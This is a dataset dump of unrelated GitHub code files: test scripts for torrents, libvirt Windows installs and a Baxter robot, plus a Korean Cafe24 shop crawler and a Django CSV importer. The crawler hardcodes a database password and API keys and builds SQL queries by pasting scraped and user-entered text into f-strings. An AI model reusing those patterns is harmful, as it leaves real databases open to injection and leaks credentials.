pathlib.Path(self.tempdir.name) / os.fsdecode(self.torrent.files[0].path)\n await asyncio.to_thread(path.write_bytes, self.torrent.files[0].data)\n # recheck the torrent\n self.handle.force_recheck()\n\n pieces = await asyncio.wait_for(self.read(self.all_pieces), 60)\n self.assertEqual(pieces, self.torrent.pieces)\n\n async def test_read_after_cancelled_read(self) -> None:\n await self.feed_pieces()\n it = self.service.read_pieces(self.handle, self.all_pieces)\n async for _ in it:\n break\n pieces = await asyncio.wait_for(self.read(self.all_pieces), 60)\n self.assertEqual(pieces, self.torrent.pieces)\n","repo_name":"AllSeeingEyeTolledEweSew/tvaf","sub_path":"tests/test_request.py","file_name":"test_request.py","file_ext":"py","file_size_in_byte":5684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29673586640","text":"import sys\nsys.path.append('/home/cc/ee106b/sp17/class/ee106b-aam/baxter_labs/src/baxter_the_builder/src')\nimport builder\n\nrospy.init_node('test_script')\n\n# Set up gripper\ngripper = baxter_gripper.Gripper('right')\ngripper.calibrate()\n\n# Set up limb\nlimb = baxter_interface.Limb('right')\nbuild = Builder(limb, gripper)\nbuild.stack_bricks('block_0', 'block_1')","repo_name":"henry-smith/baxter-the-builder","sub_path":"scripts/test_script.py","file_name":"test_script.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4446874321","text":"from urllib import request\nfrom email import header\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\nimport pymysql\nimport pyautogui\nfrom http.client import ImproperConnectionState\nfrom urllib.error import URLError, HTTPError\nimport string\nimport time\nimport re\n\n# lists = [\n # \"https://m.ycloset.com/\"\n# # \"https://m.mainbooth.co.kr/\"\n# # 
\"http://rimrim.co.kr\",\n# # \"https://themedicube.co.kr/\",\n# # \"https://www.andar.co.kr\"\n# ]\n\n\n# STEP 2: MySQL Connection 연결\ncon = pymysql.connect(host='127.0.0.1', user='root', password='fouridiot1234',\n db='Capstone', charset='utf8') # 한글처리 (charset = 'utf8')\n\n# STEP 3: Connection 으로부터 Cursor 생성\ncur = con.cursor()\n\ncur.execute(\"delete from platform_item\")\ncon.commit()\n\nproductName_List = ['h1.-font-ns', 'li.name', 'div.prdnames', 'h1.name', 'h2.info_name','h3.product-name','h2.product_title','h2']\nproductPrice_List = ['#span_product_price_text' , 'li.price']\nproductImg_List = ['.product_image ','.prdImgView', '.imgArea', '.prd-image-list']\n\n# 상품명 Parsing Class명 규칙 찾기\ndef select(name_num, price_num, img_num) :\n global frame\n\n\n # Product Name Class 찾기\n productName = frame.select_one(productName_List[name_num])\n while productName == None:\n name_num += 1\n # 예외 처리 (오류 stop 방지 - None 사용)\n if len(productName_List) <= name_num :\n productName = '예외 상황'\n name_num = 0\n else: productName = frame.select_one(productName_List[name_num])\n\n # Product Price Class 찾기\n productPrice = frame.select_one(productPrice_List[price_num])\n while productPrice == None:\n price_num += 1\n # 예외 처리 (오류 stop 방지 - None 사용)\n if len(productPrice_List) <= price_num :\n productPrice = 'sold out'\n price_num = 10000\n else: productPrice = frame.select_one(productPrice_List[price_num])\n\n # Product Img Class 찾기\n productImg = frame.select_one(productImg_List[img_num])\n while productImg == None:\n img_num += 1\n # 예외 처리 (오류 stop 방지 - None 사용)\n if len(productImg_List) <= img_num :\n productImg = '이미지 없음'\n img_num = 10000\n else: productImg = frame.select_one(productImg_List[img_num])\n \n # 해당 사이트 Class 조합 보여주기\n print(name_num, price_num, img_num)\n return name_num, price_num, img_num\n\ndef inputByUser():\n\n key = pyautogui.prompt(\"key 값을 입력해주세요..(없다면 None을 입력해주세요)\")\n\n if key == \"None\" :\n url = pyautogui.prompt(\"url을 입력해주세요.\")\n \n ##정규화해서 platform이름을 가져오기\n p = re.compile(\"www.\\w+\", re.MULTILINE)\n r = re.compile(\"//\\w+\", re.MULTILINE)\n\n platform_name = \"\"\n if not (p.findall(url)):\n platform_name = \"\".join(r.findall(url))\n platform_name = platform_name[2:]\n if platform_name == 'm':\n p = re.compile(\"m.\\w+\", re.MULTILINE)\n platform_name = \"\".join(p.findall(url))\n platform_name = platform_name[2:]\n\n else:\n platform_name = \"\".join(p.findall(url))\n platform_name = platform_name[4:]\n \n cur.execute(f\"INSERT INTO html_url VALUES('{url}','{platform_name}')\")\n con.commit()\n else:\n header = pyautogui.prompt(\"json header를 입력해주세요..\")\n cur.execute(f\"INSERT INTO platform_input VALUES('{header}', '{key}')\")\n con.commit()\n\ndef pullHtmlList():\n html_url_list = []\n count_html_list = cur.execute(\"SELECT * FROM html_url\")\n con.commit()\n result = cur.fetchall()\n for record in result:\n html_url_list.append(record)\n print(html_url_list[0][0])\n \n htmlParsing(html_url_list, count_html_list)\n\ndef pullJsonList():\n json_url_list = []\n count_json_list = cur.execute(\"SELECT * FROM platform_input\")\n con.commit()\n result = cur.fetchall()\n for record in result:\n print(record)\n json_url_list.append(record)\n print(json_url_list[0][1])\n jsonParsing(json_url_list, count_json_list)\n\n##db에 있는 만큼 arr에 넣기 위해서 필요\n\n# # func1이 실행되면 cafe의 json을 가진 사이트를 파싱\n# def jsonParsing(list, k, app_key) : \n# try:\n# requestdata = requests.get(f\"https://{list}.cafe24api.com/api/v2/products/{k}?shop_no=1&cafe24_app_key={app_key}\")\n# return requestdata\n# 
except:\n pass\n# time.sleep(1)\n# return htmlParsing()\n \n \n# If none of the functions work, fall back to parsing the whole HTML to get the values (e.g. Medicube)\n# def htmlParsing(html_url_list, count_html_list) :\n# # take one list at a time and loop over it as num1 in main\n# for i in range(count_html_list):\n# for k in range(180, 205):\n# # fetch the product sales link\n# header = {'User-Agent': 'Chrome/66.0.3359.181'}\n# url_name = html_url_list[i][0]\n# requestdata = requests.get(\n# f\"{url_name}/product/detail.html?product_no={k}\", headers=header)\n\n# # check whether the url exists\n# if requestdata.status_code == 200:\n# # parse\n# html = requestdata.text\n# soup = BeautifulSoup(html, 'html.parser')\n\n# # extract the desired information\n# name_tag = soup.select_one('.infoArea .prd_name_wrap')\n# if name_tag == None :\n# name_tag = soup.select_one('.infoArea .name')\n\n# if name_tag == None :\n# name_tag = soup.select_one('.xans-product-detail .prdnames')\n\n# if name_tag == None :\n# name_tag = soup.select_one('.xans-product-detail .name')\n\n\n# price_tag = soup.select_one('.infoArea .font_Gilroy')\n# if price_tag == None :\n# price_tag = soup.select_one('.infoArea .price')\n# if price_tag == None :\n# price_tag = soup.select_one('#span_product_price_text')\n\n# if price_tag != None and name_tag != None:\n# name = name_tag.text\n# price = price_tag.text\n# price = re.sub(r'[^0-9]', '', price)\n# # print(price)\n\n# # print('product_name :' + name, price)\n\n# ## normalize and insert the platform name (hlist)\n# cur.execute(f\"INSERT INTO platform_item VALUES('{name}','{price}','{html_url_list[0][i]}')\")\n# con.commit()\nsize_list=[]\ncolor_list=[]\nother_list=[]\n\ndef htmlParsing(html_url_list, count_html_list) :\n # take one list at a time and loop over it as num1 in main\n for i in range(count_html_list):\n # load the html url stored in the DB\n url_name = html_url_list[i][0]\n\n # reset num for each site\n name_num = 0\n price_num = 0\n img_num = 0\n a= None\n global frame\n \n\n # html rule 2 (address/product/detail.html?product_no=(int)&cate_no=(int)&display_group=(int))\n for num1 in range(5300,15000):\n\n # fetch the product sales link\n header = {'User-Agent': 'Chrome/66.0.3359.181'}\n response = requests.get(f\"{url_name}/product/detail.html?product_no={num1}\", headers=header)\n\n # check whether the url exists\n if response.status_code == 200:\n\n # parse\n html = response.text\n soup = BeautifulSoup(html, 'html.parser')\n \n # extract the required info (image, product name, price, size)\n frame = soup.select_one('html body .xans-element-.xans-product.xans-product-detail')\n\n # some sites reach infoArea inside frame; others use table, tbody, tr(1~2)\n # table = frame.find('table')\n # data = []\n # for tr in table.find_all('tr'):\n # data.append(tr)\n # print(data[0].text)\n # print(data[1].text)\n\n # skip products no longer on sale\n if frame != None :\n \n # in case the very first select() call happens to hit an exceptional site (used very rarely)\n # if a[0] == 10000 or a[1] == 10000 or a[2] == 10000 :\n # a = select(0,0,0)\n\n # if statement so select() is only called once\n if a == None:\n print(num1)\n a = select(name_num, price_num, img_num)\n print(a)\n \n if frame.select_one(productName_List[a[0]]) == None:\n name = 'unregistered Class'\n else :\n name = frame.select_one(productName_List[a[0]]).text\n\n # handle sold-out products\n if frame.select_one(productPrice_List[a[1]]) == None :\n price = 'sold out'\n else :\n price = frame.select_one(productPrice_List[a[1]]).text\n \n # avoid an error even in exceptional cases\n if frame.select_one(productImg_List[a[2]]) == None :\n img = None\n else:\n imgDiv= frame.select_one(productImg_List[a[2]])\n img = imgDiv.select_one('img').get('src')\n\n # several option selectors within a site\n \n \n select_list=[]\n for sel in frame.find_all('select'):\n select_list.append(sel)\n\n # extract the options of every selector (extract all options)\n for v in range(0, len(select_list)):\n option_list = []\n print('options')\n for op in select_list[v].find_all('option'):\n option_list.append([op.text])\n \n\n item_list=[]\n for i in range(2, len(option_list)):\n \n print(option_list[i][0])\n \n item_list.append(option_list[i][0])\n\n # first, try to tell size and color apart for clothing\n\n \n ## handle the case where real options exist beyond the placeholder rows ('- [required] please choose an option -', '-------------------')\n if(len(item_list)!=0):\n \n # print(\"haha\",item_list[0])\n # print(\"what is this\",item_list)\n # first keep only letters and digits (shoe sizes, or sizes such as M, L)\n # use the first token to tell color and size apart\n size = re.compile('[a-zA-Z0-9]+').findall(item_list[0])\n color = re.compile('[가-힣a-zA-Z]+').findall(item_list[0])\n \n print(str(size))\n \n # clothing, shoes\n # assumption: if the word 'size' appears, or a short string such as 250 (length 0-3, including M, L, XL, XXL) comes in, treat it as a size\n # for color, assume at least 2 characters, e.g. '빨강' in Korean or 'red' in English\n # odd part or accessory options are hard to handle as exceptions.\n # the len check on size handles the case where size is empty; everything after the or covers the remaining conditions\n if(len(size)>0 and (str(size[0]).lower().strip() == 'size' or str(size[0]).lower().strip() == 'one' or str(size[0]).lower().strip() =='free' or (len(size[0]) <=3 and len(size[0])>=0))) :\n print(\"appending item_list to size_list in a for loop\")\n for k in item_list:\n size_list.append(k)\n print(size_list)\n\n elif(len(color)>0 and len(color[0])>=2):\n print(\"appending item_list to color_list in a for loop\")\n for l in item_list:\n color_list.append(l)\n print(color_list)\n else:\n print(\"treat it as a generic option, put it into other_list and save to db\")\n for m in item_list:\n other_list.append(m)\n print(other_list)\n\n print(option_list)\n \n if not option_list:\n continue\n else:\n optionstr = str(option_list)\n optionstr = optionstr.replace(\"'\", \"%\")\n\n print(name , price , img, optionstr)\n price = re.sub(r'[^0-9]', '', price)\n print(name , price , img)\n k = str(color_list).replace(\"'\",' ')\n r = str(size_list).replace(\"'\",\" \")\n cur.execute(f\"INSERT INTO platform_item VALUES('{name}','{price}','{url_name}','{r}','{k}','{None}','{img}')\")\n con.commit()\n\n print('------------------------------------------------')\n\n\n \n\n# python is an interpreted language, so the order of definitions matters.\n\n# arr = [['ozkiz1', 'KU5HdZg4BVXlfoLDEPu6EC'],['mall66','f7kOrfNK8UAn2Z93owrB4C'],['marketb','O7Y0xDwkJRijRHPATmMJnC']] # must be loaded from the DB (as a DICTIONARY)\n\n# receive only the platform name and api-key and keep them in variables\n# key = pyautogui.prompt(\"please enter the key value..\")\n# platform = pyautogui.prompt(\"please enter the json header..\")\n\n# flag = False\n# save the entered values to the DB\n\n# fetch as a list and iterate\n\n# iterate as many times as desired\n\n# fetch from the DB as a list and iterate\n## probably need to pair the two and feed them into the for loop below\n\n\n# json parsing part\ndef jsonParsing(json_url_list, count_json_list):\n for i in range (count_json_list) :\n for k in range(3500, 4350) :\n # parameters must differ depending on the outer for loop.\n platform = json_url_list[i][0]\n key = json_url_list[i][1]\n requestdata = requests.get(f\"https://{platform}.cafe24api.com/api/v2/products/{k}?shop_no=1&cafe24_app_key={key}\")\n # should probably switch to checking by type (json comes in as a dict)\n # if type(requestdata)== dict :\n \n if requestdata.status_code == 200 :\n jsonData = requestdata.json()\n\n \n for data in jsonData :\n # some odd rows have a negative price, and description must not be None, so guard with a condition.\n if float(jsonData.get(data).get(\"price\") or 0) > 0 and jsonData.get(data).get(\"description\") != None:\n\n price :int = jsonData.get(data).get(\"price\")\n # code :int = jsonData.get(data).get(\"product_code\")\n # tax_free_price :int = jsonData.get(data).get(\"price_excluding_tax\")\n name :str = jsonData.get(data).get(\"product_name\")\n img_url :str = jsonData.get(data).get(\"detail_image\")\n # des :str = jsonData.get(data).get(\"description\")\n # option :str = jsonData.get(data).get(\"\")\n # option = re.compile('[0-9]+').findall(des)\n # print(description)\n if(json_url_list[0]!=0):\n platform_name :str = json_url_list[i][0]\n else:\n continue\n\n query = f\"INSERT INTO platform_item VALUES('{name}','{price}','{platform_name}','{None}','{None}','{None}','{img_url}')\"\n cur.execute(query)\n con.commit()\n print(\"platform_name\", \" : \", platform_name , ',', data, \" : \", price, \", platform_name\",\" : \", platform_name, \"img_url\",\" : \", img_url)\n print(\"-----------------------------------------------------------------------------\")\n else :\n continue\n else:\n continue\n\n\n## Main\n\nprint(\"DB connection complete\")\n# inputByUser()\nprint(\"user input complete\")\npullHtmlList()\nprint(\"HTML parsing complete\")\npullJsonList()\nprint(\"json parsing complete\")\n\ncon.close()\n","repo_name":"four-idiots/Industry-project_Cafe24-Crawling-","sub_path":"Youngsu/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":17672,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"3855047414","text":"import os\nimport re\nimport time\nimport shutil\nimport tempfile\n\nfrom libvirttestapi.src import sharedmod\nfrom libvirttestapi.utils import utils, process\nfrom libvirttestapi.repos.installation import install_common\nfrom libvirttestapi.utils.utils import version_compare\n\n#virtio win disk driver\nVIRTIO_WIN_64 = \"/usr/share/virtio-win/virtio-win_amd64.vfd\"\nVIRTIO_WIN_32 = \"/usr/share/virtio-win/virtio-win_x86.vfd\"\nVIRTIO_WIN_SERVERS_64 = \"/usr/share/virtio-win/virtio-win_servers_amd64.vfd\"\nVIRTIO_WIN_SERVERS_32 = \"/usr/share/virtio-win/virtio-win_servers_x86.vfd\"\nVIRTIO_WIN10_64 = \"/usr/share/virtio-win/virtio-win_w10_amd64.vfd\"\nVIRTIO_WIN10_32 = \"/usr/share/virtio-win/virtio-win_w10_x86.vfd\"\n#virtio win net driver\nVIRTIO_WIN_ISO = \"/usr/share/virtio-win/virtio-win.iso\"\n\nWIN_UNATTENDED_IMG = \"/tmp/win_unattended.img\"\nHOME_PATH = utils.get_base_path()\n\nrequired_params = ('guestname', 'guestos', 'guestarch',)\noptional_params = {'memory': 4194304,\n 'vcpu': 2,\n 'disksize': 20,\n 'diskpath': '/var/lib/libvirt/images/libvirt-test-api',\n 'imageformat': 'qcow2',\n 'hddriver': 'virtio',\n 'nicdriver': 'virtio',\n 'macaddr': '52:54:00:97:e4:28',\n 'type': 'define',\n 'uuid': '05867c1a-afeb-300e-e55e-2673391ae080',\n 'xml': 'xmls/install_windows.xml',\n 'guestmachine': 'pc',\n 'graphic': 'spice',\n 'video': 'qxl',\n 'storage': 'local',\n 'sourcehost': '',\n 'sourcepath': '',\n 'gluster_server_ip': None\n }\n\n\ndef cleanup(mount):\n \"\"\"Clean up a previously used mountpoint.\n @param mount: Mountpoint to be cleaned up.\n \"\"\"\n if os.path.isdir(mount):\n if os.path.ismount(mount):\n logger.error(\"Path %s is still mounted, please verify\" % mount)\n else:\n logger.info(\"Removing mount point %s\" % mount)\n os.rmdir(mount)\n\n\ndef prepare_iso(iso_file):\n \"\"\"fetch windows iso file\n \"\"\"\n # download iso_file into /tmp\n windows_iso = iso_file.split('/')[-1]\n iso_local_path = os.path.join(\"/tmp\", windows_iso)\n if not os.path.exists(iso_local_path):\n cmd = \"wget \" + iso_file + \" -P \" + \"/tmp\"\n utils.exec_cmd(cmd, shell=True)\n return iso_local_path\n\n\ndef prepare_win_unattended(guestname, guestos, guestarch, envparser, hddriver, logger):\n if \"win7\" in guestos or \"win2008\" in guestos:\n cdkey = envparser.get_value(\"guest\", \"%s_%s_key\" % (guestos, 
guestarch))\n else:\n cdkey = \"\"\n\n windows_unattended_path = os.path.join(HOME_PATH,\n \"libvirttestapi/repos/installation/windows_unattended\")\n\n if os.path.exists(WIN_UNATTENDED_IMG):\n os.remove(WIN_UNATTENDED_IMG)\n\n cmd = 'dd if=/dev/zero of=%s bs=1440k count=1' % WIN_UNATTENDED_IMG\n ret = process.run(cmd, shell=True, ignore_status=True)\n if ret.exit_status:\n logger.error(\"failed to create windows unattended image.\")\n return 1\n\n cmd = 'mkfs.msdos -s 1 %s' % WIN_UNATTENDED_IMG\n ret = process.run(cmd, shell=True, ignore_status=True)\n if ret.exit_status:\n logger.error(\"failed to format windows unattended image\")\n return 1\n\n unattended_mount = \"/tmp/test_api_windows_unattended\"\n if os.path.exists(unattended_mount):\n logger.info(\"the windows unattended mount point folder exists, remove it\")\n shutil.rmtree(unattended_mount)\n\n logger.info(\"create mount point %s\" % unattended_mount)\n os.makedirs(unattended_mount)\n\n try:\n mount_cmd = 'mount -o loop %s %s' % (WIN_UNATTENDED_IMG, unattended_mount)\n ret = process.run(mount_cmd, shell=True, ignore_status=True)\n if ret.exit_status:\n logger.error(\n \"failed to mount %s to %s\" % (WIN_UNATTENDED_IMG, unattended_mount))\n return 1\n\n win_os = ['win2008', 'win7', 'vista', 'win8', 'win2012', 'win10', 'win2016', 'win2019']\n if any(os in guestos for os in win_os):\n dest_fname = \"autounattend.xml\"\n if guestos == 'win7' and utils.isRelease(\"8\", logger):\n source = os.path.join(windows_unattended_path, \"%s_%s_rhel8.xml\" % (guestos, guestarch))\n else:\n source = os.path.join(windows_unattended_path, \"%s_%s.xml\" %\n (guestos, guestarch))\n elif '2003' in guestos or 'xp' in guestos:\n dest_fname = \"winnt.sif\"\n setup_file = 'winnt.bat'\n setup_file_path = os.path.join(windows_unattended_path, setup_file)\n setup_file_dest = os.path.join(unattended_mount, setup_file)\n shutil.copyfile(setup_file_path, setup_file_dest)\n source = os.path.join(windows_unattended_path, \"%s_%s.sif\" %\n (guestos, guestarch))\n\n dest = os.path.join(unattended_mount, dest_fname)\n\n unattended_contents = open(source).read()\n dummy_cdkey_re = r'\\bLIBVIRT_TEST_CDKEY\\b'\n if re.search(dummy_cdkey_re, unattended_contents):\n unattended_contents = re.sub(dummy_cdkey_re, cdkey,\n unattended_contents)\n\n logger.debug(\"Unattended install %s contents:\" % dest_fname)\n\n win_arch = \"\"\n if guestarch == \"x86_64\":\n win_arch = \"amd64\"\n else:\n if utils.isRelease(\"8\", logger):\n win_arch = \"x86\"\n else:\n win_arch = \"i386\"\n\n driverpath = \"\"\n drivernet = \"\"\n win_list = {\"win7\": \"w7\",\n \"win8\": \"w8\",\n \"win8u1\": \"w8.1\",\n \"win10\": \"w10\",\n \"win2008\": \"2k8\",\n \"win2008R2\": \"2k8R2\",\n \"win2003\": \"2k3\",\n \"win2012\": \"2k12\",\n \"win2012R2\": \"2k12R2\",\n \"win2016\": \"2k16\",\n \"win2019\": \"2k19\"}\n\n if utils.isRelease(\"8\", logger):\n if hddriver == \"scsilun\" or hddriver == \"scsi\":\n driverpath = \"E:\\\\vioscsi\\\\\" + win_list[guestos] + \"\\\\\" + win_arch\n else:\n driverpath = \"E:\\\\viostor\\\\\" + win_list[guestos] + \"\\\\\" + win_arch\n drivernet = \"E:\\\\NetKVM\\\\\" + win_list[guestos] + \"\\\\\" + win_arch\n else:\n drivernet = \"A:\\\\\"\n if guestos == \"win8u1\":\n driverpath = \"A:\\\\\" + win_arch + r\"\\Win8.1\"\n else:\n driverpath = \"A:\\\\\" + win_arch + \"\\\\\" + guestos[0].upper() + guestos[1:]\n\n unattended_contents = unattended_contents.replace('PATHOFDRIVER', driverpath)\n unattended_contents = unattended_contents.replace('DRIVERNET', 
drivernet)\n open(dest, 'w').write(unattended_contents)\n logger.debug(unattended_contents)\n\n finally:\n cmd = \"mount | grep %s\" % unattended_mount\n ret = process.run(cmd, shell=True, ignore_status=True)\n if ret.exit_status == 0:\n cmd = 'umount %s' % unattended_mount\n ret = process.run(cmd, shell=True, ignore_status=True)\n if ret.exit_status:\n logger.error(\"umount failed: %s\" % cmd)\n return 1\n\n cleanup(unattended_mount)\n\n os.chmod(WIN_UNATTENDED_IMG, 0o755)\n logger.info(\"Windows unattended boot image created successfully\")\n\n return 0\n\n\ndef set_win_driver(xmlstr, guestos, guestarch, logger):\n if utils.isRelease(\"8\", logger):\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN_ISO)\n return xmlstr\n\n if version_compare(\"virtio-win\", 1, 9, 6, logger):\n win_list = [\"win7\", \"win8\", \"win8u1\", \"win10\"]\n win_servers_list = [\"win2003\", \"win2008\", \"win2008R2\", \"win2012\", \"win2012R2\", \"win2016\"]\n if guestarch == \"x86_64\":\n if guestos in win_list:\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN_64)\n elif guestos in win_servers_list:\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN_SERVERS_64)\n else:\n logger.error(\"%s is not in the windows list.\" % guestos)\n else:\n if guestos in win_list:\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN_32)\n elif guestos in win_servers_list:\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN_SERVERS_32)\n else:\n logger.error(\"%s is not in the windows list.\" % guestos)\n elif version_compare(\"virtio-win\", 1, 9, 4, logger):\n if guestarch == \"x86_64\":\n if guestos == \"win10\":\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN10_64)\n else:\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN_64)\n else:\n if guestos == \"win10\":\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN10_32)\n else:\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN_32)\n elif version_compare(\"virtio-win\", 1, 9, 3, logger):\n if guestarch == \"x86_64\":\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN_64)\n else:\n xmlstr = xmlstr.replace(\"DRIVERPATH\", VIRTIO_WIN_32)\n return xmlstr\n\n\ndef install_windows_iso(params):\n \"\"\" install a windows guest virtual machine by using iso file \"\"\"\n # Initiate and check parameters\n global logger\n\n logger = params['logger']\n guestname = params.get('guestname')\n guestos = params.get('guestos')\n guestarch = params.get('guestarch')\n seeksize = params.get('disksize', 20)\n imageformat = params.get('imageformat', 'qcow2')\n diskpath = params.get('diskpath', '/var/lib/libvirt/images/libvirt-test-api')\n nicdriver = params.get('nicdriver', 'virtio')\n graphic = params.get('graphic', 'spice')\n video = params.get('video', 'qxl')\n xmlstr = params.get('xml')\n uuid = params.get('uuid', '05867c1a-afeb-300e-e55e-2673391ae080')\n hddriver = params.get('hddriver', 'virtio')\n sourcehost = params.get('sourcehost', '')\n sourcepath = params.get('sourcepath', '')\n storage = params.get('storage', 'local')\n installtype = params.get('type', 'define')\n\n options = [guestname, guestos, guestarch, nicdriver, hddriver, imageformat, graphic, video, diskpath, seeksize, storage]\n install_common.prepare_env(options, logger)\n\n if utils.isRelease(\"8\", logger) and guestos == \"win2008\":\n logger.info(\"virtio-win doesn't support win2008 on RHEL 8.\")\n return 0\n\n mountpath = tempfile.mkdtemp()\n diskpath = install_common.setup_storage(params, mountpath, logger)\n xmlstr = xmlstr.replace('/var/lib/libvirt/images/libvirt-test-api', diskpath)\n\n xmlstr = install_common.set_video_xml(video, xmlstr)\n\n if guestos == \"win10\" or guestos == \"win2016\":\n xmlstr = xmlstr.replace(\"\\n \", \"\\n \\n Westmere\\n \\n \\n\"\n \" \")\n\n xmlstr = xmlstr.replace('UUID', uuid)\n\n # NICDRIVER\n if nicdriver == 'virtio' or nicdriver == 'e1000' or nicdriver == 'rtl8139':\n xmlstr = xmlstr.replace(\"type='virtio'\", \"type='%s'\" % nicdriver)\n else:\n logger.error('the %s is unsupported by KVM' % nicdriver)\n return 1\n\n # Graphic type\n xmlstr = xmlstr.replace('GRAPHIC', graphic)\n\n # Hard disk type\n if hddriver == 'virtio':\n xmlstr = xmlstr.replace('DEV', 'vda')\n elif hddriver == 'ide':\n xmlstr = xmlstr.replace('DEV', 'hda')\n elif hddriver == 'scsi':\n xmlstr = xmlstr.replace('DEV', 'sda')\n elif hddriver == 'sata':\n xmlstr = xmlstr.replace('DEV', 'sda')\n elif hddriver == 'lun':\n xmlstr = xmlstr.replace('\"lun\"', '\"virtio\"')\n xmlstr = xmlstr.replace('DEV', 'vda')\n xmlstr = xmlstr.replace('device=\"disk\"', 'device=\"lun\"')\n xmlstr = xmlstr.replace('disk device=\"lun\" type=\"file\"', 'disk device=\"lun\" type=\"block\"')\n iscsi_path = install_common.get_iscsi_disk_path(sourcehost, sourcepath)\n xmlstr = xmlstr.replace('file=\"%s\"' % diskpath, \"dev='%s'\" % iscsi_path)\n xmlstr = xmlstr.replace('device=\"cdrom\" type=\"block\">', 'device=\"cdrom\" type=\"file\">')\n elif hddriver == 'scsilun':\n xmlstr = xmlstr.replace('\"scsilun\"', '\"scsi\"')\n xmlstr = xmlstr.replace('DEV', 'sda')\n xmlstr = xmlstr.replace('device=\"disk\"', 'device=\"lun\"')\n xmlstr = xmlstr.replace('disk device=\"lun\" type=\"file\"', 'disk device=\"lun\" type=\"block\"')\n iscsi_path = install_common.get_iscsi_disk_path(sourcehost, sourcepath)\n xmlstr = xmlstr.replace('file=\"%s\"' % diskpath, \"dev='%s'\" % iscsi_path)\n xmlstr = xmlstr.replace('device=\"cdrom\" type=\"block\">', 'device=\"cdrom\" type=\"file\">')\n xmlstr = set_win_driver(xmlstr, guestos, guestarch, logger)\n\n logger.info(\"get system environment information\")\n envparser = install_common.get_env_parser()\n iso_url = envparser.get_value(\"guest\", guestos + '_' + guestarch)\n iso_file = install_common.get_path_from_url(iso_url, \".iso\")\n logger.debug('install source: %s' % iso_file)\n\n logger.info('prepare pre-installation environment...')\n iso_local_path = prepare_iso(iso_file)\n xmlstr = xmlstr.replace('WINDOWSISO', iso_local_path)\n\n status = prepare_win_unattended(guestname, guestos, guestarch, envparser, hddriver, logger)\n if status:\n logger.error(\"making windows unattended image failed\")\n return 1\n xmlstr = xmlstr.replace('WIN_UNATTENDED', WIN_UNATTENDED_IMG)\n\n logger.debug('dump installation guest xml:\\n%s' % xmlstr)\n conn = sharedmod.libvirtobj['conn']\n if not install_common.start_guest(conn, installtype, xmlstr, logger):\n logger.error(\"failed to define domain %s\" % guestname)\n return 1\n\n if not install_common.wait_install(conn, guestname, xmlstr, installtype, \"iso\", logger, \"12000\", guestos, iso_file):\n return 1\n\n time.sleep(60)\n if storage != \"local\":\n install_common.clean_guest(guestname, logger)\n install_common.cleanup_storage(params, mountpath, logger)\n\n return 0\n\n\ndef install_windows_iso_clean(params):\n \"\"\" clean testing environment \"\"\"\n logger = params['logger']\n guestname = params.get('guestname')\n guestos = params.get('guestos')\n guestarch = params.get('guestarch')\n diskpath = params.get('diskpath', '/var/lib/libvirt/images/libvirt-test-api')\n\n install_common.clean_guest(guestname, logger)\n 
install_common.remove_all(diskpath, logger)\n\n envparser = install_common.get_env_parser()\n iso_url = envparser.get_value(\"guest\", guestos + '_' + guestarch)\n iso_file = install_common.get_path_from_url(iso_url, \".iso\")\n iso_local_path = prepare_iso(iso_file)\n if os.path.exists(iso_local_path):\n os.remove(iso_local_path)\n\n iso_local_path_1 = iso_local_path + \".1\"\n if os.path.exists(iso_local_path_1):\n os.remove(iso_local_path_1)\n\n if os.path.exists(WIN_UNATTENDED_IMG):\n os.remove(WIN_UNATTENDED_IMG)\n","repo_name":"libvirt/libvirt-test-API","sub_path":"libvirttestapi/repos/installation/install_windows_iso.py","file_name":"install_windows_iso.py","file_ext":"py","file_size_in_byte":15335,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"} +{"seq_id":"26525821345","text":"import csv\nimport sys\nimport os\n\ndef import_codes():\n '''\n Imports a csv file to create Tree objects with location-specific trigger words.\n\n The command expects the database to have a TreeState object with the name: \"Welcome (city).\"\n This differentiates it from the generic TreeState (i.e., the one called \"Welcome\", \n triggered by the keyword \"connect\").\n '''\n reader = csv.DictReader(sys.stdin)\n\n for row in reader:\n root_state = TreeState.objects.filter(name__icontains='Welcome (city)').first()\n\n padded_code = row['Code'].zfill(4)\n \n tree_info = {\n 'trigger': padded_code,\n 'root_state': root_state,\n 'summary': 'city',\n }\n\n tree, created = Tree.objects.get_or_create(**tree_info)\n\n if created:\n sys.stdout.write('Created {}'.format(tree))\n\n sys.stdout.write('Successfully processed CSV!')\n\nif __name__ == \"__main__\":\n sys.path.append('..')\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"coordinated-entry-screening.settings\")\n\n from django.core.wsgi import get_wsgi_application\n application = get_wsgi_application()\n\n from decisiontree.models import Tree, TreeState\n\n import_codes()","repo_name":"datamade/coordinated-entry-screening","sub_path":"data/port_location_codes.py","file_name":"port_location_codes.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"38581180012","text":"import tensorflow as tf\nimport numpy as np\nimport tensorflow.keras.backend as K\nimport tensorflow as tf\nfrom sklearn.metrics import confusion_matrix\n\nx = tf.constant([0.1,0.9, 2.5, 2.3, 1.5, -4.5])\ny=tf.constant([[1,0,0],[1,0,1]])\n\n\nprint((y[:,1]))\nweights = np.ones((2, 2))\nnp.array([[1,0,0],[1,0,1]])\nweights[0, 1] = 25\nweights[1, 0] = 5\n#final_mask = K.ones_like(y_pred[:, 0])\ninit = 